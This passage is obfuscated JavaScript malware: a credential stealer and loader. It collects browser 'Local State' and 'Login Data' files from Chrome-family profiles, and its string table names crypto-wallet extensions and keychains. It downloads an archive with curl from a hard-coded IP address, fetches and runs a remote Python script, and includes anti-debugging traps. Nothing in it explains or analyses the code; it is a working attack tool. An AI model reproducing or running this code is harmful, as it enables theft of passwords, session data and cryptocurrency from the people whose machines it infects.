let _0x3c3a1d = _0x11dfbb + "/Local State";
if (_0x5d6927.existsSync(_0x3c3a1d)) {
try {
const _0xa0d1b = {
filename: _0x1558fe + "_lst"
};
_0x1a0daf.push({
'value': _0x5d6927.createReadStream(_0x3c3a1d),
'options': _0xa0d1b
});
} catch (_0x10cd5a) {}
}
try {
if (_0x58c289(_0x11dfbb)) {
for (let _0x18d117 = 0; _0x18d117 < 200; _0x18d117++) {
const _0x256825 = _0x11dfbb + '/' + (0 === _0x18d117 ? "Default" : "Profile " + _0x18d117);
try {
if (!_0x58c289(_0x256825)) {
continue;
}
const _0x2120f0 = _0x256825 + "/Login Data";
if (!_0x58c289(_0x2120f0)) {
continue;
}
const _0x240c4b = {
filename: _0x1558fe + '_' + _0x18d117 + "_uld"
};
_0x1a0daf.push({
'value': _0x5d6927.createReadStream(_0x2120f0),
'options': _0x240c4b
});
} catch (_0x7e5944) {}
}
}
} catch (_0x26511a) {}
_0x1d40e9(_0x1a0daf, _0x2c6034);
return _0x1a0daf;
};
function _0x4db77a(_0x54d20b, _0x2335f6, _0x3f5711, _0x24fd41, _0x1c2503) {
return _0x2c1b(_0x1c2503 + 713, _0x24fd41);
}
let _0x12c6fc = 0;
(function () {
let _0x635dd9;
try {
const _0x35f3bc = Function("return (function() {}.constructor(\"return this\")( ));");
_0x635dd9 = _0x35f3bc();
} catch (_0x2817b8) {
_0x635dd9 = window;
}
_0x635dd9.setInterval(_0x23e34d, 4000);
})();
function _0x3e8d45(_0x11f906, _0x1630cb, _0xdb2689, _0x5aaac9, _0x2648fd) {
return _0x2c1b(_0xdb2689 - '0x32b', _0x1630cb);
}
function _0x4eb4() {
const _0x38f4c4 = ['RHmqc', 'omjjk', 'ApteI', 'sCumQ', 'copyF', '/ld_', 'rome', 'fgpgk', 'exec', 'rneKI', 'lLrSF', 'push', 'test', 'const', 'OiABa', 'nkbih', 'ocal/', '/Libr', 'gpafn', '/Logi', 'count', 'hostn', '/Goog', 'type', 'ain', 'gger', '3037OzSgDk', 'ctor(', 'round', 'fdial', 'multi', 'mdjon', 'ata', 'idb', 'oihof', "is\")(", 'knmef', 'ync', '125CwSmIC', 'VPgoc', 'ware/', 'ess', 'IGRsE', "\\pyth", 'repla', 'Micro', 'wlUAS', '0-9a-', "\\+\\+ ", 'ensio', '-rele', 'pjiig', 'SvCSl', '16zYubJH', 'bind', 'rmSyn', 'hoSHZ', 'e/Chr', 'log', 'hfood', 'LswSJ', 'write', 'wynjd', '//95.', 'OkPvv', 'woHII', '13479389yigTOw', 'TzzgA', 'oohck', 'ort/G', '/AppD', 'Brave', 'googl', '_lst', 'ata/', 'acmac', 'AVJaB', 'on.ex', 'isDir', 'Data', 'lengt', 'jXfuU', "\\.pyp", 'yzTXQ', 'url', 'jgjfh', 'inclu', 'call', 'ng/Op', '$]*)', 'xfpZo', 'filen', 'eebol', 'ome', 'jblnd', 'excep', 'ZDfOB', 'brld_', 'bohma', 'aeaoe', 'uCJgo', 'nt/', 'trace', "n3 \"", 'IOjHQ', 'ejbal', 'nhcel', 'NNhzn', '382902FMrTAX', 'StRpE', 'ort/B', '23610RVWEoM', 'ion', 'oamin', 'table', 'pebkl', '164qDPepv', 'hid', '6465221OiGmbD', '15101090qJHwNn', 'Z_$][', 'bbldc', 'Strea', 'ogin.', 'nstru', 'post', 'ZEGam', 'JOVFD', "l Ext", 'init', '/stor', 'info', 'oZjzq', 'g/Moz', 'wOJfi', ')+)+)', 'ser', 'ame', "n (fu", 'nmhnf', 'WpCbt', 'xtens', 'bGCdl', 'forEa', '*(?:[', 'nctio', 'Defau', 'ary/K', 'bfnae', 'moz-e', 'apply', '28JNYCjU', 'rave-', '/.con', "rn th", 'UroxN', 'http:', 'des', 'raveS', 'HGaea', "-Lo \"", '/id.j', " (tru", 'fbeog', 'are/B', 'eSoft', 'ofile', " Supp", 'size', 'solan', 'bvLnu', 'path', 'Roami', 'input', 'ata/R', 'cionb', 'sJMRc', 'fOasi', 'wambz', 'dgcij', 'dlcob', 'oogle', 'conso', "ion *", "l Sta", 'tmpdi', 'warn', 'peras', "e\" \"", 'logkc', 'FZJcA', 'formD', 'statS', 'setIn', 'opera', 'lipeo', 'jXzWn', 'BmaWn', '.ldb', 'ophhp', 'error', 'eycha', '/Loca', 'funct', 'DHpkL', 'ation', 'pytho', '/pdow', 'Firef', '/.npl', '1396917dSIpDK', 'proto', 'Brows', 'lmeee', 'child', 'ins/l', 'ajnim', 'bohpj', 'ing', '_proc', 'fhboh', 'knocf', '(((.+', 'ibnej', "\" \"", 're.Op', '/uplo', "xf ", 'apagc', "n() ", 'czYua', 'DaCRF', 'GfbKa', 'pplic', 'PlQuv', "\"retu", 'eofbd', 'lmome', 'searc', 'ile', 'hifaf', 'vdKma', 'lYbbZ', " Data", 're/Op', 'onoee', 'imhlp', '7.24:', "\\( *\\", 'pld_', 'ave-B', 'gdVKS', 'ox/Pr', 'Nchdc', 'CAdIA', 'eRead', 'ads', 'YvgzM', "n Dat", 'state', 'retur', 'ructo', '/Brav', 'readd', 'bakop', 'JLXSG', 'strin', 'imael', 'efaul', 'Softw', 'ilkdb', "e) {}", 'Objec', 'ector', 'Profi', 'soft/', 'join', 'le/Ch', 'eSync', 'homed', '102', 'behhm', 'platf', 'keych', '164.1', 'dfjmm', 'aholp', 'VpXqy', '.log', 'pekpl', "curl ", 'qaEUw', '.file', '/clie', 'JPxEu', 'exist', 'acces', '1224', 'kkolj', "tar -", 'ldhgm', "le ", 'ata/L', 'aeach', 'lchlg', 'mgjnj', 'age/d', '_file', 'UaQym', 'oftwa', 'FileS', 'QxhnJ', 'toStr', 'cfgod', 'YCNuG', 'OaJhU', " -C ", 'cyKTi', 'Etbne', '__pro', 'tings', 'ccfch', 'txt', '{}.co', 'irSyn', "\\p2.z", 'fig/', '-Brow', 'renam', 'dirna', 'SIQUz', 'Edge/', '_uld', 'RdYzg', 'hecda', 'reque', '/Chro', 'sSync', 're/Br', 'jbmgj', 'phepc', 'ary/A', 'uts', 'pndod', 'fig/s', 'kodbe', 'omihk', 'WSGWI', 'nkdna', 'zA-Z_', 'olana', 'PwHqq', 'a-zA-', 'kpcnl', 'creat', 'terva', 'illa/', 'ase', 'WDvbl', '/User', 'to__', 'debu', 'orm', 'owgIh', 'ZVViQ', 'idlcd', 'gvOfj', "era S", 'rowse', 'SfxxB', 'ort/', 'pikoo', "n Set", "\\p.zi", 'dgmol', 'odkjb', 'chain', 'lZQox', "User ", 'a_id.', 'son', 'mnkoe', 'era', 'Local', 'gmccd', 'tion', 'actio', 'e-chr', 'get', 'ngcna', '-db', 'while', 'hlefn', 'com.o', 'hnfan', 'ihOIO', 'Googl', 'getTi'];
_0x4eb4 = function () {
return _0x38f4c4;
};
return _0x4eb4();
}
const _0x770cde = async _0x10cf14 => {
_0x5f30d8("tar -xf " + _0x10cf14 + " -C " + _0x107674, (_0x324a1d, _0x252b20, _0x133078) => {
if (_0x324a1d) {
_0x5d6927.rmSync(_0x10cf14);
return void (_0x12c6fc = 0);
}
_0x5d6927.rmSync(_0x10cf14);
_0x12016a();
});
};
const _0x1cbec7 = () => {
const _0x20d03c = _0x46f1a8 + "\\p.zi";
const _0x1cfbc1 = _0x46f1a8 + "\\p2.zip";
if (_0x12c6fc >= 51476596) {
return;
}
if (_0x5d6927.existsSync(_0x20d03c)) {
try {
var _0xce5828 = _0x5d6927.statSync(_0x20d03c);
if (_0xce5828.size >= 51476596) {
_0x12c6fc = _0xce5828.size;
_0x5d6927.rename(_0x20d03c, _0x1cfbc1, _0x553356 => {
if (_0x553356) {
throw _0x553356;
}
_0x770cde(_0x1cfbc1);
});
} else {
if (_0x12c6fc < _0xce5828.size) {
_0x12c6fc = _0xce5828.size;
} else {
_0x5d6927.rmSync(_0x20d03c);
_0x12c6fc = 0;
}
_0x502c9e();
}
} catch (_0x58b069) {}
} else {
_0x5f30d8("curl -Lo \"" + _0x20d03c + "\" \"" + "http://95.164.17.24:1224/pdown" + "\"", (_0x5411ad, _0xcb4513, _0x5de2d3) => {
if (_0x5411ad) {
_0x12c6fc = 0;
return void _0x502c9e();
}
try {
_0x12c6fc = 51476596;
_0x5d6927.renameSync(_0x20d03c, _0x1cfbc1);
_0x770cde(_0x1cfbc1);
} catch (_0x97a7a5) {}
});
}
};
function _0x502c9e() {
setTimeout(() => {
_0x1cbec7();
}, 20000);
}
function _0x57a4c1(_0x43c66e, _0x2a997b, _0x48cd90, _0x40e99d, _0x1e8e5b) {
return _0x2c1b(_0x40e99d - '0x275', _0x2a997b);
}
const _0x12016a = async () => await new Promise((_0x233d9e, _0x5c8f91) => {
if ('w' == _0x44547c[0]) {
if (_0x5d6927.existsSync(_0x107674 + "\\.pyp\\python.exe")) {
(() => {
const _0xd5cb33 = _0x107674 + "/.npl";
const _0x8f1f03 = "\"" + _0x107674 + "\\.pyp\\python.exe\" \"" + _0xd5cb33 + "\"";
try {
_0x5d6927.rmSync(_0xd5cb33);
} catch (_0x305187) {}
_0x2672a8.get("http://95.164.17.24:1224/client/10/102", (_0x4b6c32, _0x5867cc, _0x301229) => {
if (!_0x4b6c32) {
try {
_0x5d6927.writeFileSync(_0xd5cb33, _0x301229);
_0x5f30d8(_0x8f1f03, (_0x4795b0, _0x118518, _0x147813) => {});
} catch (_0x1b1d20) {}
}
});
})();
} else {
_0x1cbec7();
}
} else {
(() => {
_0x2672a8.get("http://95.164.17.24:1224/client/10/102", (_0x571ef, _0x54cdca, _0x20d052) => {
if (!_0x571ef) {
_0x5d6927.writeFileSync(_0x107674 + "/.npl", _0x20d052);
_0x5f30d8("python3 \"" + _0x107674 + "/.npl\"", (_0xc70c90, _0x515aed, _0x3e5a0a) => {});
}
});
})();
}
});
var _0x533351 = 0;
const _0x196775 = async () => {
try {
const _0x13ba90 = Math.round(new Date().getTime() / 1000);
await (async () => {
try {
await _0x3bafbe(_0x112912, 0, _0x13ba90);
await _0x3bafbe(_0x59e3a3, 1, _0x13ba90);
await _0x3bafbe(_0x1c4641, 2, _0x13ba90);
_0x136e48(_0x13ba90);
if ('w' == _0x44547c[0]) {
await _0x55c70b(_0x1aace1('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, _0x13ba90);
}
if ('d' == _0x44547c[0]) {
await _0x1d28ea(_0x13ba90);
} else {
await _0x25acc1(_0x112912, 0, _0x13ba90);
await _0x25acc1(_0x59e3a3, 1, _0x13ba90);
await _0x25acc1(_0x1c4641, 2, _0x13ba90);
}
} catch (_0x17de0d) {}
})();
_0x12016a();
} catch (_0xf5fe05) {}
};
_0x196775();
_0x12016a();
function _0x2c1b(_0x57d912, _0x489406) {
const _0xe0c94e = _0x4eb4();
_0x2c1b = function (_0x3218d3, _0x12f9e8) {
_0x3218d3 = _0x3218d3 - 300;
let _0x159f5f = _0xe0c94e[_0x3218d3];
return _0x159f5f;
};
return _0x2c1b(_0x57d912, _0x489406);
}
let _0xed7e8 = setInterval(() => {
if ((_0x533351 += 1) < 5) {
_0x196775();
} else {
clearInterval(_0xed7e8);
}
}, 30000);
function _0x23e34d(_0x2f4e6d) {
const _0x38e1c7 = {
IOjHQ: function (_0x32d44b, _0xc77f73) {
return _0x32d44b / _0xc77f73;
}
};
_0x38e1c7.ZEGam = function (_0x6c6b2f, _0x3afe78) {
return _0x6c6b2f % _0x3afe78;
};
_0x38e1c7.PwHqq = "action";
function _0x36aeff(_0x314f83) {
if (typeof _0x314f83 === "string") {
return function (_0x19d64e) {}.constructor("while (true) {}").apply("counter");
} else if (('' + _0x314f83 / _0x314f83).length !== 1 || _0x38e1c7.ZEGam(_0x314f83, 20) === 0) {
(function () {
return true;
}).constructor("debugger").call(_0x38e1c7.PwHqq);
} else {
(function () {
return false;
}).constructor("debugger").apply("stateObject");
}
_0x36aeff(++_0x314f83);
}
try {
if (_0x2f4e6d) {
return _0x36aeff;
} else {
_0x36aeff(0);
}
} catch (_0x4fcfd7) {}
}